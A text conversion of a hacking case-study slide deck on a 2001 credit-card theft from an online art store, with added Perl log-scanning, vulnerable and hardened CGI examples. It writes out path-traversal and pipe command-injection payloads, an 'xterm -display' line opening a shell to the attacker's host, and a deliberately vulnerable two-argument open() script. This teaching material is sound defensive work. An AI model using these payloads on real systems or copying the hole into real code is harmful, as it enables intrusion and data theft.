![Page 1: Hacking Case Study Sungchul Hong. Acme Art, Inc. Case October 31, 2001 A hacker stole credit card numbers from the online store’s database](https://reader036.vdocuments.us/reader036/viewer/2022062714/56649d215503460f949f637d/html5/thumbnails/1.jpg)
Hacking Case Study
Sungchul Hong
![Page 2: Hacking Case Study Sungchul Hong. Acme Art, Inc. Case October 31, 2001 A hacker stole credit card numbers from the online store’s database](https://reader036.vdocuments.us/reader036/viewer/2022062714/56649d215503460f949f637d/html5/thumbnails/2.jpg)
Acme Art, Inc. Case
• October 31, 2001
• www.acme-art.com
• A hacker stole credit card numbers from the online store's database.
• A firewall was installed.
• Only ports 80 and 443 were open.
• The computer forensics team found the following:
![Page 3: Hacking Case Study Sungchul Hong. Acme Art, Inc. Case October 31, 2001 A hacker stole credit card numbers from the online store’s database](https://reader036.vdocuments.us/reader036/viewer/2022062714/56649d215503460f949f637d/html5/thumbnails/3.jpg)
Server Environment
• Apache 1.3.12 on a Linux system
• The site was served by a Perl CGI script
![Page 4: Hacking Case Study Sungchul Hong. Acme Art, Inc. Case October 31, 2001 A hacker stole credit card numbers from the online store’s database](https://reader036.vdocuments.us/reader036/viewer/2022062714/56649d215503460f949f637d/html5/thumbnails/4.jpg)
![Page 5: Hacking Case Study Sungchul Hong. Acme Art, Inc. Case October 31, 2001 A hacker stole credit card numbers from the online store’s database](https://reader036.vdocuments.us/reader036/viewer/2022062714/56649d215503460f949f637d/html5/thumbnails/5.jpg)
The hacker browses the web pages and clicks on images.
![Page 6: Hacking Case Study Sungchul Hong. Acme Art, Inc. Case October 31, 2001 A hacker stole credit card numbers from the online store’s database](https://reader036.vdocuments.us/reader036/viewer/2022062714/56649d215503460f949f637d/html5/thumbnails/6.jpg)
![Page 7: Hacking Case Study Sungchul Hong. Acme Art, Inc. Case October 31, 2001 A hacker stole credit card numbers from the online store’s database](https://reader036.vdocuments.us/reader036/viewer/2022062714/56649d215503460f949f637d/html5/thumbnails/7.jpg)
http://www.acme-art.com/index.cgi?page=tahoe1.shtml
![Page 8: Hacking Case Study Sungchul Hong. Acme Art, Inc. Case October 31, 2001 A hacker stole credit card numbers from the online store’s database](https://reader036.vdocuments.us/reader036/viewer/2022062714/56649d215503460f949f637d/html5/thumbnails/8.jpg)
Hacker's Move
• http://www.acme-art.com/index.cgi?page=index.cgi
• 10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /cgi-bin/ HTTP/1.0" 403 272 (an attempt to list /cgi-bin/, refused with 403)
• The hacker sees that index.cgi accepts a file name as a parameter and displays the contents of that file.
• He passes index.cgi itself as the parameter, so the script displays its own source code.
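Every move in this case went through Apache as an ordinary request, and the log line above shows what one looks like on disk. The following Perl script is added here as an example (it is not part of the case study): it parses common-log-format lines and flags the request patterns the rest of the deck describes: a CGI asked to include itself, `..` traversal, access to /etc/passwd, and shell metacharacters in the query. The log lines in it are constructed to mirror the deck; the 403 line is the one quoted above, while the remaining requests and the exact pipe payload are assumptions.

```perl
#!/usr/bin/perl
# Scan Apache common-log lines for the request patterns in the Acme Art case.
# Added example; the log lines below are constructed, not taken from the incident.
use strict;
use warnings;

# Each rule is matched against the URL-decoded request target (path + query).
my @rules = (
    [ 'cgi-self-include' => qr{index\.cgi\?.*=.*index\.cgi}i ],   # page=index.cgi
    [ 'path-traversal'   => qr{(?:^|[/\\])\.\.(?:[/\\]|$)} ],       # /../ sequences
    [ 'sensitive-file'   => qr{/etc/(?:passwd|shadow)\b} ],
    [ 'shell-metachar'   => qr{[|;`\n\r]} ],                        # pipe, ';', backtick, %0A/%0D
);

# Decode '+' and %XX so that an encoded newline (%0A) is seen as a newline.
sub url_decode {
    my $s = shift;
    $s =~ tr/+/ /;
    $s =~ s/%([0-9A-Fa-f]{2})/chr hex $1/ge;
    return $s;
}

# Parse one common-log line into (client, time, request line, status);
# returns an empty list for lines that do not match the format.
sub parse_line {
    my $line = shift;
    return () unless $line =~ /^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) \S+/;
    return ($1, $2, $3, $4);
}

# Returns one hit per (line, rule) match.
sub scan {
    my @hits;
    for my $line (@_) {
        my ($client, $time, $request, $status) = parse_line($line) or next;
        my (undef, $target) = split / /, $request;
        next unless defined $target;
        my $decoded = url_decode($target);
        for my $rule (@rules) {
            my ($name, $re) = @$rule;
            push @hits, { client => $client, time => $time, rule => $name,
                          target => $target, status => $status }
                if $decoded =~ $re;
        }
    }
    return @hits;
}

# Constructed log lines mirroring the moves in the deck. The 403 line is the one
# quoted in the deck; the other requests (and the pipe payload) are assumed.
my @log = (
    '10.0.1.21 - - [31/Oct/2001:03:01:12 +0530] "GET /index.cgi?page=tahoe1.shtml HTTP/1.0" 200 3412',
    '10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /cgi-bin/ HTTP/1.0" 403 272',
    '10.0.1.21 - - [31/Oct/2001:03:04:09 +0530] "GET /index.cgi?page=index.cgi HTTP/1.0" 200 1588',
    '10.0.1.21 - - [31/Oct/2001:03:06:55 +0530] "GET /index.cgi?page=/../../../../../../../../../etc/passwd HTTP/1.0" 200 946',
    '10.0.1.21 - - [31/Oct/2001:03:09:30 +0530] "GET /index.cgi?page=ls+-la+/%0Aid%0Awhich+xterm| HTTP/1.0" 200 2210',
);

# The harmless tahoe1.shtml request produces no hit; the other three CGI
# requests produce four hits between them (the passwd line matches two rules).
for my $h (scan(@log)) {
    printf "%-10s %-26s %-17s %s\n", $h->{client}, $h->{time}, $h->{rule}, $h->{target};
}
```

Run it over a real access_log with `scan(<STDIN>)` after chomping the lines; the point is that the firewall saw only port 80 traffic, but the application log still carries every step of the intrusion. Note that each of the flagged requests returned 200, so status codes alone would not have revealed the attack.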
![Page 9: Hacking Case Study Sungchul Hong. Acme Art, Inc. Case October 31, 2001 A hacker stole credit card numbers from the online store’s database](https://reader036.vdocuments.us/reader036/viewer/2022062714/56649d215503460f949f637d/html5/thumbnails/9.jpg)
Vulnerability Revealed
*** No validation of the page parameter ***
The source code of index.cgi is revealed.
![Page 10: Hacking Case Study Sungchul Hong. Acme Art, Inc. Case October 31, 2001 A hacker stole credit card numbers from the online store’s database](https://reader036.vdocuments.us/reader036/viewer/2022062714/56649d215503460f949f637d/html5/thumbnails/10.jpg)
Vulnerability
The hacker guesses the names and paths of system files, then opens them through the same parameter.
![Page 11: Hacking Case Study Sungchul Hong. Acme Art, Inc. Case October 31, 2001 A hacker stole credit card numbers from the online store’s database](https://reader036.vdocuments.us/reader036/viewer/2022062714/56649d215503460f949f637d/html5/thumbnails/11.jpg)
The error message reveals implementation details of the script.
![Page 12: Hacking Case Study Sungchul Hong. Acme Art, Inc. Case October 31, 2001 A hacker stole credit card numbers from the online store’s database](https://reader036.vdocuments.us/reader036/viewer/2022062714/56649d215503460f949f637d/html5/thumbnails/12.jpg)
![Page 13: Hacking Case Study Sungchul Hong. Acme Art, Inc. Case October 31, 2001 A hacker stole credit card numbers from the online store’s database](https://reader036.vdocuments.us/reader036/viewer/2022062714/56649d215503460f949f637d/html5/thumbnails/13.jpg)
Hacker's Next Move
http://www.acme-art.com/index.cgi?page=/../../../../../../../../../etc/passwd
(dumps the passwd file to the browser)
![Page 14: Hacking Case Study Sungchul Hong. Acme Art, Inc. Case October 31, 2001 A hacker stole credit card numbers from the online store’s database](https://reader036.vdocuments.us/reader036/viewer/2022062714/56649d215503460f949f637d/html5/thumbnails/14.jpg)
Message
• The entire contents of the /etc/passwd file are returned and displayed in the browser.
• root:x:0:0:root:/root:/bin/bash
  bin:x:1:1:bin:/bin:
  daemon:x:2:2:daemon:/sbin:
  adm:x:3:4:adm:/var/adm:
  lp:x:4:7:lp:/var/spool/lpd:
  sync:x:5:0:sync:/sbin:/bin/sync
  shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
  halt:x:7:0:halt:/sbin:/sbin/halt
  …
![Page 15: Hacking Case Study Sungchul Hong. Acme Art, Inc. Case October 31, 2001 A hacker stole credit card numbers from the online store’s database](https://reader036.vdocuments.us/reader036/viewer/2022062714/56649d215503460f949f637d/html5/thumbnails/15.jpg)
Next Move
The hacker puts a pipe character in the file parameter together with commands of his choice. Because index.cgi hands the parameter to Perl's two-argument open(), the pipe turns the "file name" into a shell command: instead of opening a file, Perl opens a file handle that receives the standard output of the commands given in the parameter.
![Page 16: Hacking Case Study Sungchul Hong. Acme Art, Inc. Case October 31, 2001 A hacker stole credit card numbers from the online store’s database](https://reader036.vdocuments.us/reader036/viewer/2022062714/56649d215503460f949f637d/html5/thumbnails/16.jpg)
Code
• ls -la /  (lists the files in the root directory)
• id  (shows the user and group the CGI runs as)
• which xterm  (finds the path to the xterm binary)
• (the commands are separated with a URL-encoded line feed, %0A)
• Now the hacker can run any command on the Web server with the privileges of the "nobody" account.
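To make the preceding slides concrete (source disclosure, the passwd traversal and the pipe trick), here is a reconstruction, written for this page and not the actual Acme Art script, of a CGI with the behaviour the deck describes. Its one real feature is the two-argument open() on the unchecked page parameter; the default page name, the query-string parser and the payloads in the comments are assumptions.

```perl
#!/usr/bin/perl
# index.cgi, reconstructed: a script of the kind the deck describes.
# NOT the real Acme Art source (the deck never shows it); only the behaviour
# matches: the "page" parameter goes straight into a two-argument open().
use strict;
use warnings;

# Minimal CGI query parsing (CGI.pm is no longer in core Perl).
sub query_params {
    my %p;
    for my $pair (split /&/, ($ENV{QUERY_STRING} // '')) {
        my ($k, $v) = split /=/, $pair, 2;
        next unless defined $k && length $k;
        $v = '' unless defined $v;
        $v =~ tr/+/ /;
        $v =~ s/%([0-9A-Fa-f]{2})/chr hex $1/ge;   # %0A becomes a real newline
        $p{$k} = $v;
    }
    return %p;
}

my %param = query_params();
my $page  = defined $param{page} ? $param{page} : 'index.shtml';   # default is assumed

print "Content-Type: text/html\r\n\r\n";

# THE BUG: with two arguments, open() interprets the string instead of
# treating it purely as a file name:
#   page=index.cgi                      -> opens the script itself (source disclosure)
#   page=/../../../../../../etc/passwd  -> any file readable by "nobody" (traversal)
#   page=ls+-la+/%0Aid%0Awhich+xterm|   -> a trailing '|' makes Perl run the string
#                                          as a shell command and read its stdout;
#                                          the decoded newlines separate the commands
open(my $fh, $page)
    or do {
        # Echoing the name and the OS error tells the attacker that the
        # parameter is fed to open() (the "error message reveals" slide).
        print "Error opening $page: $!\n";
        exit 0;
    };
print while <$fh>;
close $fh;
```

It can be exercised from a shell without a web server, because CGI passes the query through the environment: `QUERY_STRING='page=index.cgi' perl index.cgi` prints the script's own source, `QUERY_STRING='page=/../../../../etc/passwd' perl index.cgi` prints the local passwd file, and `QUERY_STRING='page=id|' perl index.cgi` runs `id`. Under Apache the commands run as the server's user, which is why the hacker's shell reports uid 99 (nobody).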
![Page 17: Hacking Case Study Sungchul Hong. Acme Art, Inc. Case October 31, 2001 A hacker stole credit card numbers from the online store’s database](https://reader036.vdocuments.us/reader036/viewer/2022062714/56649d215503460f949f637d/html5/thumbnails/17.jpg)
Use xterm to gain interactive shell access to the Web server.
xterm -display 10.0.1.21:0.0 &
(The xterm command launches an xterm window back to the attacker's X display on 10.0.1.21:0.0, an outbound connection from the server to the attacker's X server.)
![Page 18: Hacking Case Study Sungchul Hong. Acme Art, Inc. Case October 31, 2001 A hacker stole credit card numbers from the online store’s database](https://reader036.vdocuments.us/reader036/viewer/2022062714/56649d215503460f949f637d/html5/thumbnails/18.jpg)
Hacker's View
• bash$ id
• uid=99(nobody) gid=99(nobody) groups=99(nobody)
• bash$ pwd
• /usr/local/apache/htdocs
• bash$
![Page 19: Hacking Case Study Sungchul Hong. Acme Art, Inc. Case October 31, 2001 A hacker stole credit card numbers from the online store’s database](https://reader036.vdocuments.us/reader036/viewer/2022062714/56649d215503460f949f637d/html5/thumbnails/19.jpg)
Note
• The attacker used only port 80 (the HTTP port).
• Every step was an ordinary HTTP request.
• The firewall therefore could not help.
• Lesson:
  – All inputs must be validated.
  – Do not disclose unnecessary information (source code, error messages, file contents).
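A hardened version of the same kind of script, as an added example (not the fix Acme Art applied, which the deck does not show). It applies both lessons: the page parameter must match a strict allowlist pattern and resolve inside one directory, the file is opened with a three-argument open() so the string can never be read as a command, and error detail goes to the error log rather than the browser. The page directory, the default page and the query parser are assumptions.

```perl
#!/usr/bin/perl
# index.cgi, hardened. Added example; not the fixed Acme Art code.
use strict;
use warnings;
use Cwd qw(realpath);

# Pages live in one fixed directory (assumed location); nothing outside it is opened.
my $PAGE_DIR = realpath('/usr/local/apache/htdocs/pages')
    or die "page directory missing\n";

# Minimal CGI query parsing (CGI.pm is no longer in core Perl).
sub query_params {
    my %p;
    for my $pair (split /&/, ($ENV{QUERY_STRING} // '')) {
        my ($k, $v) = split /=/, $pair, 2;
        next unless defined $k && length $k;
        $v = '' unless defined $v;
        $v =~ tr/+/ /;
        $v =~ s/%([0-9A-Fa-f]{2})/chr hex $1/ge;
        $p{$k} = $v;
    }
    return %p;
}

# Positive validation: a page name is a short token followed by ".shtml".
# '/', '..', '|', whitespace and control characters cannot pass this test,
# so neither the traversal nor the pipe trick is reachable.
sub valid_page_name {
    my $name = shift;
    return defined $name && $name =~ /\A[A-Za-z0-9_-]{1,64}\.shtml\z/;
}

print "Content-Type: text/html\r\n\r\n";

my %param = query_params();
my $page  = defined $param{page} ? $param{page} : 'index.shtml';

unless (valid_page_name($page)) {
    print "Bad request\n";            # generic: nothing about the filesystem leaks
    exit 0;
}

# Defence in depth: canonicalise and confirm the file is still below $PAGE_DIR
# (covers a symlink dropped into the page directory).
my $path = realpath("$PAGE_DIR/$page");
unless (defined $path && index($path, "$PAGE_DIR/") == 0 && -f $path) {
    print "Page not found\n";
    exit 0;
}

# Three-argument open with an explicit read mode: the third argument is a
# file name and nothing else, whatever characters it contains.
open(my $fh, '<', $path) or do {
    warn "open $path: $!";            # detail goes to Apache's error log, not the browser
    print "Page not found\n";
    exit 0;
};
print while <$fh>;
close $fh;
```

The allowlist regex is what actually closes the hole; the realpath check and the three-argument open are there so that a later edit relaxing the pattern does not silently reopen it. Running the earlier payloads against this version (`QUERY_STRING='page=index.cgi'`, `page=/../../etc/passwd`, `page=id|`) now yields only "Bad request".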